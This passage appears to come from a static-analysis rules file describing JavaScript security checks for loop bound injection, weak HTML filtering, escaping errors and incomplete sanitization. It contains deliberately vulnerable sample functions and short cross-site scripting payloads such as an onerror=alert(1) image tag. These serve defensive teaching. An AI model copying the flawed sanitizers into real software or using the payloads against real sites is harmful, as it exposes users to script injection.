ret.push(obj[i]);\n    }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n    \n    if (!(obj instanceof Array)) { // Prevents DoS.\n        return [];\n    }\n\n    var ret = [];\n\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n"},"properties":{"tags":["security","external/cwe/cwe-834","external/cwe/cwe-730"],"description":"Iterating over an object with a user-controlled .length\n              property can cause indefinite looping.","id":"js/loop-bound-injection","kind":"path-problem","name":"Loop bound injection","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/bad-tag-filter","name":"js/bad-tag-filter","shortDescription":{"text":"Bad HTML filtering regexp"},"fullDescription":{"text":"Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `<script>` tags.\n\n\n```javascript\nfunction filterScript(html) {\n    var scriptRegex = /<script\\b[^>]*>([\\s\\S]*?)<\\/script>/gi;\n    var match;\n    while ((match = scriptRegex.exec(html)) !== null) {\n        html = html.replace(match[0], match[1]);\n    }\n    return html;\n}\n\n```\nThe above sanitizer does not filter out all `<script>` tags. Browsers will not only accept `</script>` as script end tags, but also tags such as `</script foo=\"bar\">` even though it is a parser error. This means that an attack string such as `<script>alert(1)</script foo=\"bar\">` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy &amp; Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n","markdown":"# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `<script>` tags.\n\n\n```javascript\nfunction filterScript(html) {\n    var scriptRegex = /<script\\b[^>]*>([\\s\\S]*?)<\\/script>/gi;\n    var match;\n    while ((match = scriptRegex.exec(html)) !== null) {\n        html = html.replace(match[0], match[1]);\n    }\n    return html;\n}\n\n```\nThe above sanitizer does not filter out all `<script>` tags. Browsers will not only accept `</script>` as script end tags, but also tags such as `</script foo=\"bar\">` even though it is a parser error. This means that an attack string such as `<script>alert(1)</script foo=\"bar\">` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy &amp; Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116","external/cwe/cwe-184","external/cwe/cwe-185","external/cwe/cwe-186"],"description":"Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.","id":"js/bad-tag-filter","kind":"problem","name":"Bad HTML filtering regexp","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/double-escaping","name":"js/double-escaping","shortDescription":{"text":"Double escaping or unescaping"},"fullDescription":{"text":"When escaping special characters using a meta-character like backslash or ampersand, the meta-character has to be escaped first to avoid double-escaping, and conversely it has to be unescaped last to avoid double-unescaping."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `&lt;` and the double-quote character as `&quot;`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&amp;/g, \"&\")\n          .replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me &amp; &quot;you&quot;`, and the string `&quot;` is encoded as `&amp;quot;`.\n\nThe decoding function, however, incorrectly decodes `&amp;` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&amp;quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\")\n          .replace(/&amp;/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `&lt;` and the double-quote character as `&quot;`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&amp;/g, \"&\")\n          .replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me &amp; &quot;you&quot;`, and the string `&quot;` is encoded as `&amp;quot;`.\n\nThe decoding function, however, incorrectly decodes `&amp;` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&amp;quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\")\n          .replace(/&amp;/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-116","external/cwe/cwe-020"],"description":"When escaping special characters using a meta-character like backslash or\n              ampersand, the meta-character has to be escaped first to avoid double-escaping,\n              and conversely it has to be unescaped last to avoid double-unescaping.","id":"js/double-escaping","kind":"problem","name":"Double escaping or unescaping","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-sanitization","name":"js/incomplete-sanitization","shortDescription":{"text":"Incomplete string escaping or encoding"},"fullDescription":{"text":"A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116"],"description":"A string transformer that does not replace or escape all occurrences of a\n              meta-character may be ineffective.","id":"js/incomplete-sanitization","kind":"problem","name":"Incomplete string escaping or encoding","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/unsafe-html-expansion","name":"js/unsafe-html-expansion","shortDescription":{"text":"Unsafe expansion of self-closing HTML tag"},"fullDescription":{"text":"Using regular expressions to expand self-closing HTML tags may lead to cross-site scripting vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `<div attr=\"{sanitized}\"/>` to `<div attr=\"{sanitized}\"></div>` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1></$2>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n<div alt=\"\n<x\" title=\"/>\n<img src=url404 onerror=alert(1)>\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n<div alt=\"\n<x\" title=\"></x\" >\n<img src=url404 onerror=alert(1)>\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `<div attr=\"{sanitized}\"/>` to `<div attr=\"{sanitized}\"></div>` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1></$2>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n<div alt=\"\n<x\" title=\"/>\n<img src=url404 onerror=alert(1)>\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n<div alt=\"\n<x\" title=\"></x\" >\n<img src=url404 onerror=alert(1)>\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using regular expressions to expand self-closing HTML\n              tags may lead to cross-site scripting vulnerabilities.","id":"js/unsafe-html-expansion","kind":"problem","name":"Unsafe expansion of self-closing HTML tag","precision":"very-high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/incomplete-html-attribute-sanitization","name":"js/incomplete-html-attribute-sanitization","shortDescription":{"text":"Incomplete HTML attribute sanitization"},"fullDescription":{"text":"Writing incompletely sanitized values to HTML attribute strings can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete HTML attribute sanitization\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. Usually, this is done by escaping `<`, `>`, `&` and `\"`. However, the context in which the sanitized value is used decides the characters that need to be sanitized.\n\nAs a consequence, some programs only sanitize `<` and `>` since those are the most common dangerous characters. The lack of sanitization for `\"` is problematic when an incompletely sanitized value is used as an HTML attribute in a string that later is parsed as HTML.\n\n\n## Recommendation\nSanitize all relevant HTML meta-characters when constructing HTML dynamically, and pay special attention to where the sanitized value is used.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) to an HTML attribute of the server response. The user-controlled value is, however, not sanitized for `\"`. This leaves the website vulnerable to cross-site scripting since an attacker can use a string like `\" onclick=\"alert(42)` to inject JavaScript code into the response.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>/g, \"\"); // BAD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\nSanitizing the user-controlled data for `\"` helps prevent the vulnerability:\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>|&|\"/g, \"\"); // GOOD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete HTML attribute sanitization\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. Usually, this is done by escaping `<`, `>`, `&` and `\"`. However, the context in which the sanitized value is used decides the characters that need to be sanitized.\n\nAs a consequence, some programs only sanitize `<` and `>` since those are the most common dangerous characters. The lack of sanitization for `\"` is problematic when an incompletely sanitized value is used as an HTML attribute in a string that later is parsed as HTML.\n\n\n## Recommendation\nSanitize all relevant HTML meta-characters when constructing HTML dynamically, and pay special attention to where the sanitized value is used.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) to an HTML attribute of the server response. The user-controlled value is, however, not sanitized for `\"`. This leaves the website vulnerable to cross-site scripting since an attacker can use a string like `\" onclick=\"alert(42)` to inject JavaScript code into the response.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>/g, \"\"); // BAD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\nSanitizing the user-controlled data for `\"` helps prevent the vulnerability:\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>|&|\"/g, \"\"); // GOOD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","external/cwe/cwe-020"],"description":"Writing incompletely sanitized values to HTML\n              attribute strings can lead to a cross-site\n              scripting vulnerability.","id":"js/incomplete-html-attribute-sanitization","kind":"path-problem","name":"Incomplete HTML attribute sanitization","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/incomplete-multi-character-sanitization","name":"js/incomplete-multi-character-sanitization","shortDescription":{"text":"Incomplete multi-character sanitization"},"fullDescription":{"text":"A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/<!--|--!?>/g, \"\");   \n\n```\nGiven the input string \"&lt;!&lt;!--- comment ---&gt;&gt;\", the output will be \"&lt;!-- comment --&gt;\", which still contains an HTML comment.\n\nOne possible fix for this issue is to apply the regular expression replacement repeatedly until no more replacements can be performed. This ensures that the unsafe text does not re-appear in the sanitized input, effectively removing all instances of the targeted pattern:\n\n```javascript\n\nfunction removeHtmlComments(input) {  \n  let previous;  \n  do {  \n    previous = input;  \n    input = input.replace(/<!--|--!?>/g, \"\");  \n  } while (input !== previous);  \n  return input;  \n}  